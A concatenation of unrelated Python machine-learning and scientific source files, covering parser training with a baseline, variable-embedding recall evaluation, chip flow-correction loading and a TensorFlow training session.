_, _, valid_word_loss = decoder.compute_loss(s3, act)
if valid_word_loss is not None:
total_valid_loss += valid_word_loss.scalar_value()
total_valid_loss = total_valid_loss * 1.0 / valid_size
if total_valid_loss < lowest_valid_loss:
lowest_valid_loss = total_valid_loss
print ('saving model...')
encoder.Save(self.options.result_dir + 'model_enc')
decoder.Save(self.options.result_dir + 'model_dec')
baseline.Save(self.options.result_dir + 'baseline')
else:
lr = lr * self.options.decay
i += 1
def unsupervised_without_baseline(self):
decoder = self.create_decoder()
assert(os.path.exists(self.options.result_dir + 'model_dec'))
self.load_decoder(decoder)
encoder = self.create_encoder()
assert(os.path.exists(self.options.result_dir + 'model_enc'))
self.load_encoder(encoder)
enc_trainer = optimizers[self.options.optimizer](encoder.model)
dec_trainer = optimizers[self.options.optimizer](decoder.model)
lr = self.options.lr #used only for sgd
i = 0
lowest_valid_loss = 9999
print ('unsupervised training...')
for epoch in range(self.options.epochs):
sents = 0
total_loss = 0.0
train = self.reader.next_example(0)
train_size = len(self.reader.data[0])
for data in train:
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
sents += 1
# max sample
enc_loss_act, _, act = encoder.parse(s1, s2, s3, pos, sample=False)
_, dec_loss_act, dec_loss_word = decoder.compute_loss(s3, act)
logpxb = -dec_loss_word.scalar_value()
total_loss -= logpxb
# random sample
enc_loss_act, _, act = encoder.parse(s1, s2, s3, pos, sample=True)
_, dec_loss_act, dec_loss_word = decoder.compute_loss(s3, act)
# save reward
logpx = -dec_loss_word.scalar_value()
# reconstruction and regularization loss backprop to theta_d
dec_loss_total = dec_loss_word + dec_loss_act * dy.scalarInput(self.options.dec_reg)
dec_loss_total = dec_loss_total * dy.scalarInput(1.0 / self.options.mcsamples)
dec_loss_total.scalar_value()
dec_loss_total.backward()
# update decoder
if self.options.optimizer == 'sgd':
dec_trainer.update(lr)
else:
dec_trainer.update()
if self.options.enc_update > 0:
# policy and and regularization loss backprop to theta_e
enc_loss_act = encoder.train(s1, s2, s3, pos, act)
enc_loss_policy = enc_loss_act * dy.scalarInput((logpx - logpxb) / len(s1))
enc_loss_total = enc_loss_policy * dy.scalarInput(self.options.enc_update) - enc_loss_act * dy.scalarInput(self.options.enc_reg)
enc_loss_total = enc_loss_total * dy.scalarInput(1.0 / self.options.mcsamples)
enc_loss_total.value()
enc_loss_total.backward()
if self.options.optimizer == 'sgd':
enc_trainer.update(lr)
else:
enc_trainer.update()
e = float(i) / train_size
if i % self.options.print_every == 0:
print('epoch {}: loss per sentence: {}'.format(e, total_loss / sents))
sents = 0
total_loss = 0.0
if i!=0 and i % self.options.save_every == 0:
print('computing loss on validation set...')
total_valid_loss = 0
valid = self.reader.next_example(1)
valid_size = len(self.reader.data[1])
for vdata in valid:
s1, s2, s3, pos, act = vdata[0], vdata[1], vdata[2], vdata[3], vdata[4]
_, _, valid_word_loss = decoder.compute_loss(s3, act)
if valid_word_loss is not None:
total_valid_loss += valid_word_loss.scalar_value()
total_valid_loss = total_valid_loss * 1.0 / valid_size
if total_valid_loss < lowest_valid_loss:
lowest_valid_loss = total_valid_loss
print ('saving model...')
encoder.Save(self.options.result_dir + 'model_enc')
decoder.Save(self.options.result_dir + 'model_dec')
else:
lr = lr * self.options.decay
i += 1
def pretrain_baseline(self):
baseline = self.create_baseline()
if os.path.exists(self.options.result_dir + 'baseline'):
self.load_baseline(baseline)
baseline_trainer = optimizers[self.options.optimizer](baseline.model)
lr = self.options.lr #used only for sgd
i = 0
lowest_valid_loss = 9999
print ('train baseline, for simplicity use the same data here')
for epoch in range(self.options.epochs):
sents = 0
total_loss = 0.0
train = self.reader.next_example(0)
train_size = len(self.reader.data[0])
for data in train:
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
sents += 1
loss = -baseline(s3)
if loss is not None:
total_loss += loss.scalar_value()
loss.backward()
if self.options.optimizer == 'sgd':
baseline_trainer.update(lr)
else:
baseline_trainer.update()
e = float(i) / train_size
if i % self.options.print_every == 0:
print('epoch {}: loss per sentence: {}'.format(e, total_loss / sents))
sents = 0
total_loss = 0.0
if i!=0 and i % self.options.save_every == 0:
print('computing loss on validation set...')
total_valid_loss = 0
valid = self.reader.next_example(1)
valid_size = len(self.reader.data[1])
for vdata in valid:
s1, s2, s3, pos, act = vdata[0], vdata[1], vdata[2], vdata[3], vdata[4]
valid_loss = -baseline(s3)
if valid_loss is not None:
total_valid_loss += valid_loss.scalar_value()
total_valid_loss = total_valid_loss * 1.0 / valid_size
if total_valid_loss < lowest_valid_loss:
lowest_valid_loss = total_valid_loss
print ('saving model...')
baseline.Save(self.options.result_dir + 'baseline')
else:
lr = lr * self.options.decay
i += 1
def parsing(self):
decoder = self.create_decoder()
assert(os.path.exists(self.options.result_dir + 'model_dec'))
self.load_decoder(decoder)
encoder = self.create_encoder()
assert(os.path.exists(self.options.result_dir + 'model_enc'))
self.load_encoder(encoder)
print('parsing...')
rf = open(os.path.join(self.options.result_dir, 'result'), 'w')
test = self.reader.next_example(2)
p = Parser(encoder, decoder)
for dataid, data in enumerate(test):
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
output = p(s1, s2, s3, pos, self.options.nsamples)
rf.write(output + '\n')
rf.close()
f1 = compute_eval_score(self.options.result_dir)
print('bracket F1 score is {}'.format(f1))
def language_modeling(self):
decoder = self.create_decoder()
assert(os.path.exists(self.options.result_dir + 'model_dec'))
self.load_decoder(decoder)
encoder = self.create_encoder()
assert(os.path.exists(self.options.result_dir + 'model_enc'))
self.load_encoder(encoder)
print('computing language model score...')
test = self.reader.next_example(2)
lm = LanguageModel(encoder, decoder)
total_ll = 0
total_tokens = 0
for dataid, data in enumerate(test):
s1, s2, s3, pos, act = data[0], data[1], data[2], data[3], data[4]
if len(s1) <= 1:
continue
total_ll += lm(s1, s2, s3, pos, self.options.nsamples)
total_tokens += len(s1)
perp = compute_perplexity(total_ll, total_tokens)
print('perplexity: {}'.format(perp))
def create_decoder(self):
return Decoder(self.reader,
self.options.nlayers,
self.options.word_dim,
self.options.pretrained_dim,
self.options.action_dim,
self.options.dec_lstm_dim,
self.options.embedding_file)
def create_encoder(self):
return Encoder(self.reader,
self.options.nlayers,
self.options.word_dim,
self.options.pretrained_dim,
self.options.pos_dim,
self.options.action_dim,
self.options.enc_lstm_dim,
self.options.embedding_file)
def create_baseline(self):
baseline = None
if self.options.baseline == 'rnnlm':
baseline = LanguageModelBaseline(self.reader,
self.options.word_dim,
self.options.pretrained_dim,
self.options.dec_lstm_dim,
self.options.embedding_file)
elif self.options.baseline == 'rnnauto':
baseline = RNNAutoencBaseline(self.reader,
self.options.word_dim,
self.options.pretrained_dim,
self.options.dec_lstm_dim,
self.options.embedding_file)
elif self.options.baseline == 'mlp':
baseline = MLPAutoencBaseline(self.reader,
self.options.word_dim,
self.options.pretrained_dim,
self.options.embedding_file)
else:
raise NotImplementedError("Baseline Not Implmented")
return baseline
def load_decoder(self, decoder):
decoder.Load(self.options.result_dir + 'model_dec')
def load_encoder(self, encoder):
encoder.Load(self.options.result_dir + 'model_enc')
def load_baseline(self, baseline):
baseline.Load(self.options.result_dir + 'baseline')
|
24106
|
import sys
from collections import defaultdict
import torch
from varclr.utils.infer import MockArgs
from varclr.data.preprocessor import CodePreprocessor
if __name__ == "__main__":
ret = torch.load(sys.argv[2])
vars, embs = ret["vars"], ret["embs"]
embs /= embs.norm(dim=1, keepdim=True)
embs = embs.cuda()
var2idx = dict([(var, idx) for idx, var in enumerate(vars)])
processor = CodePreprocessor(MockArgs())
Ks = [1, 5, 10, 25, 50, 100, 250, 500, 1000]
topk_succ = defaultdict(int)
tot = 0
with open(sys.argv[1], "r") as f:
for line in f:
try:
var1, var2 = line.strip().split()
except ValueError:
print("skpped: ", line)
def canon(var):
return "".join(
[
word.capitalize() if idx > 0 else word
for idx, word in enumerate(processor(var).split())
]
)
var1, var2 = canon(var1), canon(var2)
if var1 not in var2idx or var2 not in var2idx:
print(f"variable {var1} or {var2} not found")
continue
tot += 1
for k in Ks:
result = torch.topk(embs @ embs[var2idx[var1]], k=k + 1)
topk_succ[k] += var2 in [vars[idx] for idx in result.indices][1:]
print(f"Total {tot} variable pairs")
for k in Ks:
print(f"Recall@{k} = {100 * topk_succ[k] / tot:.1f}")
|
24107
|
import os
import numpy as np
from . import imtools, datprops
from .datfile import DatFile
from .chiptype import ChipType
moduleDir = os.path.abspath( os.path.dirname( __file__ ) )
class FlowCorr:
def __init__( self, chiptype, xblock=None, yblock=None, rootdir='.', method='' ):
'''
Initialize a flowcorr object
chiptype: a ChipType object
xblock: The full-chip column origin; setting to None returns a full chip
yblock: The full-chip row origin; setting to None returns a full chip
rootdir: root directory to look for flowcorr files.
search will also look up a level, within the
module directory, and in the dats directory
method: if specified, automaticaly loads the corresponding flowcorr
'buffer'
'file'
if advanced options need to be passed into the load functions,
they should be called separatly with method being left empty
'''
self.chiptype = ChipType(chiptype)
self.xblock = xblock
self.yblock = yblock
self.searchpath = [ rootdir,
os.path.join( rootdir, '..' ),
os.path.join( moduleDir, '../dats' ),
moduleDir,
os.path.join( moduleDir, 'dats' ) ]
if method.lower() == 'buffer':
self.frombuffer()
elif method.lower() == 'file':
self.fromfile()
elif not method:
pass
else:
raise ValueError( 'Flowcorr method "%s" is undefined' % method )
def frombuffer(self, flow_file='C2_step.dat', force=False, framerate=15):
'''
Returns the flow correction measured from a buffered flow
flowfile: measurement file used to calculate the flowcorr
force: calculate the data from raw, even if an existing analysis is present
framerate: fps
'''
try:
if force:
raise IOError
self.filename = os.path.join( self.searchpath[0], 'flowcorr_slopes.dat' )
self.flowcorr = datprops.read_dat( self.filename, 'flowcorr', chiptype=self.chiptype )
except IOError:
# Read the dat file
found = False
for dirname in self.searchpath:
self.filename = os.path.join( dirname, flow_file )
if os.path.exists( self.filename ):
found = True
break
if not found:
raise IOError( '%s was not found' % self.filename )
data = DatFile( self.filename, chiptype=self.chiptype )
# Calculate properties
self.flowcorr = data.measure_slope( method='maxslope' )
self.time_offset = np.min(data.measure_t0( method='maxslope' )) #TODO: This is not very robust. should just shift t0 here and record the offest instead of trying to do things later with it
self.pinned = data.measure_pinned()
# remove pins
self.flowcorr[ self.pinned ] = 1
# Save a few more variables
self.t0 = data.measure_t0( meathod='maxslope' )
self.actpix = data.measure_actpix
self.phpoint = data.measure_plateau()
return self.flowcorr
def fromfile( self, fc_type ):
'''
Loads the flow correction from file based on the chip type and scales up from miniblocks to full chips or analysis blocks.
This method only differentiates based on thumbnail or full chip/analysis block. All other differences are rolled into ChipType.
fc_type: can be 'ecc' or 'wt'.
flowcorr file is defined by self.chiptype.flowcorr_<fc_type>
'''
# Thumbnails are enough different to have their own function
if self.chiptype.tn == 'self':
return self.tn_fromfile( fc_type )
# Spatial thumbnails are just subsampled data. We don't need special loading
# Calculate the size of the flowcorr files
xMiniBlocks = self.chiptype.chipC / self.chiptype.miniC
yMiniBlocks = self.chiptype.chipR / self.chiptype.miniR
# Set the flowcorr path starting local before using the default
for path in self.searchpath:
filename = os.path.join( path, '%s.dat' % getattr( self.chiptype, 'flowcorr_%s' % fc_type ) )
try:
flowcorr = datprops.read_dat( filename , metric='flowcorr' )
break
except IOError:
continue
raise IOError( 'Could not find a flowcorr file' )
# Scale the flowcorr data to the entire well
sizes = [ ( 96, 168 ), # This is an unscaled P1-sized flowcorr file. This is the most likely size when reading fc_flowcorr.dat
( yMiniBlocks, xMiniBlocks ), # This is the historical per-chip file. This is ( 96, 168 ) for a P1/540 chip
( self.chiptype.chipR, self.chiptype.chipC ) ] # This is the pre-compiled value
try:
fc_xMiniBlocks = self.chiptype.fullchip.chipC / self.chiptype.fullchip.miniC
fc_yMiniBlocks = self.chiptype.fullchip.chipR / self.chiptype.fullchip.miniR
sizes.append( ( fc_yMiniBlocks, fc_xMiniBlocks ) )
sizes.append( ( self.chiptype.fullchip.chipR, self.chiptype.fullchip.chipC ) )
except AttributeError:
pass
for size in sizes:
try:
flowcorr = flowcorr.reshape( size )
break
except ValueError:
# Keep going until you itterate through all possible sizes. If you still get an error, then die
if size == sizes[-1]:
print 'Possible Sizes'
print sizes
print 'Elements'
print flowcorr.shape
raise ValueError( 'Could not determine flowcorr size' )
continue
# Resize the image to the current size
if self.chiptype.burger is None:
# This is a standard resize operation
flowcorr = imtools.imresize( flowcorr, ( self.chiptype.chipR, self.chiptype.chipC ) )
elif self.chiptype.spatn != 'self':
# This is burger mode on a full size chip
flowcorr = imtools.imresize( flowcorr, ( self.chiptype.burger.chipR, self.chiptype.burger.chipC ) )
# Clip off the top and bottom
first = ( flowcorr.shape[0] - self.chiptype.chipR ) / 2
last = first + self.chiptype.chipR
flowcorr = flowcorr[ first:last, : ]
else:
# This is burger mode on a spatial thumbnail
# This has the effect of adding more rows beyond the 800 typically used for a spatial thumbnail
rows = self.chiptype.chipR * self.chiptype.burger.chipR / self.chiptype.fullchip.chipR
flowcorr = imtools.imresize( flowcorr, ( rows, self.chiptype.chipC ) )
# Clip off the top and bottom
first = ( flowcorr.shape[0] - self.chiptype.chipR ) / 2
last = first + self.chiptype.chipR
flowcorr = flowcorr[ first:last, : ]
# Reduce to a single analysis block
if ( self.xblock is not None and self.yblock is not None and
self.xblock != -1 and self.yblock != -1 ):
flowcorr = flowcorr[ self.yblock: self.chiptype.blockR + self.yblock,
self.xblock: self.chiptype.blockC + self.xblock ]
self.flowcorr = flowcorr
return flowcorr
def tn_fromfile( self, fc_type ):
'''
Gets the per-well flowcorrection for a STANDARD (not spatial) thumbnail
'''
# Calculate the size of the flowcorr files
xMiniBlocks = self.chiptype.chipC / self.chiptype.miniC
yMiniBlocks = self.chiptype.chipR / self.chiptype.miniR
# Set the flowcorr path starting local before using the default
for path in self.searchpath:
filename = os.path.join( path, '%s.dat' % getattr( self.chiptype, 'flowcorr_%s' % fc_type ) )
try:
flowcorr = datprops.read_dat( filename , metric='flowcorr' )
break
except IOError:
continue
raise IOError( 'Could not find a flowcorr file' )
# Scale the flowcorr data to the entire well
sizes = ( ( 96, 168 ), # This is an unscaled P1-sized flowcorr file.
( 48, 96 ) , # This is an unscaled P0-sized flowcorr file.
( yMiniBlocks, xMiniBlocks ), # This is the historical thumbnail flowcorr (swapped x & y - STP 7/13/2015)
( self.chiptype.fullchip.chipR, self.chiptype.fullchip.chipC ) ) # This is the pre-compiled value
for size in sizes:
try:
flowcorr = flowcorr.reshape( size )
break
except ValueError:
# Keep going until you itterate through all possible sizes. If you still get an error, then die
if size == sizes[-1]:
raise ValueError( 'Could not determine flowcorr size' )
continue
# Resize the image to the full chip size
if self.chiptype.burger is None:
# This is a standard resize operation based on the full chip
flowcorr = imtools.imresize( flowcorr, ( self.chiptype.fullchip.chipR, self.chiptype.fullchip.chipC ) )
else:
# This is burger mode on a regular thumbnail. Full chip is actually specified by burger and then we have to clip
flowcorr = imtools.imresize( flowcorr, ( self.chiptype.burger.chipR, self.chiptype.burger.chipC ) )
# Clip off the top and bottom
first = ( flowcorr.shape[0] - self.chiptype.fullchip.chipR ) / 2
last = first + self.chiptype.fullchip.chipR
flowcorr = flowcorr[ first:last, : ]
# Reduce to thumbnail data
tnflowcorr = np.zeros( ( self.chiptype.chipR, self.chiptype.chipC ) )
for r in range( self.chiptype.yBlocks ):
tn_rstart = r*self.chiptype.blockR
tn_rend = tn_rstart + self.chiptype.blockR
#fc_rstart = int( (r+0.5)*self.chiptype.fullchip.blockR ) - self.chiptype.blockR/2
# middle of block in case the thumbnail different yBlocks center within the block
fc_rstart = int( (r+0.5)*(self.chiptype.fullchip.chipR/self.chiptype.yBlocks) ) - self.chiptype.blockR/2
fc_rend = fc_rstart + self.chiptype.blockR
for c in range( self.chiptype.xBlocks ):
tn_cstart = c*self.chiptype.blockC
tn_cend = tn_cstart + self.chiptype.blockC
fc_cstart = int( (c+0.5)*self.chiptype.fullchip.blockC ) - self.chiptype.blockC/2
fc_cend = fc_cstart + self.chiptype.blockC
tnflowcorr[ tn_rstart:tn_rend, tn_cstart:tn_cend ] = flowcorr[ fc_rstart:fc_rend, fc_cstart:fc_cend ]
self.flowcorr = tnflowcorr
return self.flowcorr
|
24147
|
import math
import tensorflow as tf
from mayo.log import log
from mayo.util import (
Percent, memoize_method, memoize_property, object_from_params)
from mayo.session.base import SessionBase
class Train(SessionBase):
mode = 'train'
def __init__(self, config):
super().__init__(config)
self._run_train_ops = True
self._setup_train_operation()
self._init()
self._checkpoint_epoch = ''
@memoize_property
def learning_rate(self):
params = self.config.train.learning_rate
lr_class, params = object_from_params(params)
if lr_class is tf.train.piecewise_constant:
# `tf.train.piecewise_constant` uses argument name 'x' instead
# just to make life more difficult
step_name = 'x'
else:
step_name = 'global_step'
params[step_name] = self.num_epochs
log.debug(
'Using learning rate {!r} with params {}.'
.format(lr_class.__name__, params))
return lr_class(**params)
@memoize_property
def optimizer(self):
params = self.config.train.optimizer
optimizer_class, params = object_from_params(params)
log.debug('Using optimizer {!r}.'.format(optimizer_class.__name__))
return optimizer_class(self.learning_rate, **params)
@staticmethod
def _average_gradients(tower_grads):
tower_grads = list(tower_grads)
if len(tower_grads) == 1:
return tower_grads[0]
average_grads = []
for grad_and_vars in zip(*tower_grads):
grads = []
for g, v in grad_and_vars:
# add 0 dimension to the gradients to represent the tower
if g is None:
raise ValueError(
'Gradient for variable {} is None, please check '
'connection.'.format(v))
g = tf.expand_dims(g, 0)
grads.append(g)
# average over the 'tower' dimension.
grad = tf.concat(axis=0, values=grads)
grad = tf.reduce_mean(grad, 0)
# simply return the first tower's pointer to the Variable
v = grad_and_vars[0][1]
grad_and_var = (grad, v)
average_grads.append(grad_and_var)
return average_grads
@staticmethod
def _loss_formatter(key, name):
def formatter(estimator):
loss_mean, loss_std = estimator.get_mean_std(key)
if math.isnan(loss_mean):
raise ValueError('Model diverged with a nan-valued loss.')
loss_std = '±{}'.format(Percent(loss_std / loss_mean))
return '{}: {:10f}{:5}'.format(name, loss_mean, loss_std)
return formatter
@memoize_method
def _losses_and_gradients(self):
formatter = self._loss_formatter('regularization', 'regu')
regularization = self.get_collection(
tf.GraphKeys.REGULARIZATION_LOSSES, first_gpu=True)
if regularization:
self.estimator.register(
tf.add_n(regularization), 'regularization',
formatter=formatter)
def gradient(net, prediction, truth):
loss = [self.task.train(net, prediction, truth)] + regularization
loss = tf.add_n(loss)
return loss, self.optimizer.compute_gradients(loss)
tower_losses, tower_grads = zip(*self.task.map(gradient))
return tower_losses, self._average_gradients(tower_grads)
def _setup_train_operation(self):
ops = {}
self._losses, gradients = self._losses_and_gradients()
self._mean_loss = tf.reduce_mean(self._losses)
ops['app_grad'] = self.optimizer.apply_gradients(gradients)
# update ops
update_ops = list(self.get_collection(tf.GraphKeys.UPDATE_OPS))
ops['update'] = tf.group(*update_ops, name='update')
log.debug('Using update operations: {}'.format(update_ops))
log.debug('Using training operations: {}'.format(ops))
if self.extra_train_ops:
ops['extra'] = self.extra_train_ops
self._train_op = ops
def _init(self):
self.load_checkpoint(self.config.system.checkpoint.load)
formatter = self._loss_formatter('loss', 'loss')
self.estimator.register(self._mean_loss, 'loss', formatter=formatter)
def reset_num_epochs(self):
log.info('Reseting number of training epochs of the model...')
self.run(self.imgs_seen.initializer)
self.change.reset('checkpoint.epoch')
self.change.reset('step')
def once(self):
train_op = self._train_op if self._run_train_ops else []
tasks = [train_op, self.num_epochs]
_, num_epochs = self.run(tasks, batch=True)
return num_epochs
def overriders_assign(self):
log.info('Assigning overridden values of parameters to parameters...')
self._overriders_call('assign')
def overriders_update(self):
log.info('Updating overrider internal variables...')
self._overriders_call('update')
def overriders_reset(self):
log.info('Resetting overriders internal variables...')
self._overriders_call('reset')
def _iteration(self, max_epochs=None):
system = self.config.system
epoch = self.once()
floor_epoch = math.floor(epoch)
cp_interval = system.checkpoint.get('save.interval', 0)
if self.change.every('checkpoint.epoch', floor_epoch, cp_interval):
log.info(
'Saving checkpoint at epoch {}...'.format(epoch), update=True)
with log.demote():
self.save_checkpoint(floor_epoch)
self._checkpoint_epoch = floor_epoch
max_epochs = max_epochs or system.max_epochs
if max_epochs and epoch >= max_epochs:
log.info(
'Maximum epoch count {} reached.'.format(max_epochs))
if self._checkpoint_epoch and floor_epoch > self._checkpoint_epoch:
log.info('Saving final checkpoint...')
self.save_checkpoint(floor_epoch)
return False
return True
def train(self, max_epochs=None):
# final debug outputs
lr = self.run(self.learning_rate)
log.info('Training start with a learning rate {}.'.format(lr))
try:
# train iterations
while self._iteration(max_epochs=max_epochs):
pass
except KeyboardInterrupt:
log.info('Stopped.')
save = self.config.system.checkpoint.get('save', {})
if save:
countdown = save.get('countdown', 0)
if log.countdown('Saving checkpoint', countdown):
self.save_checkpoint('latest')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.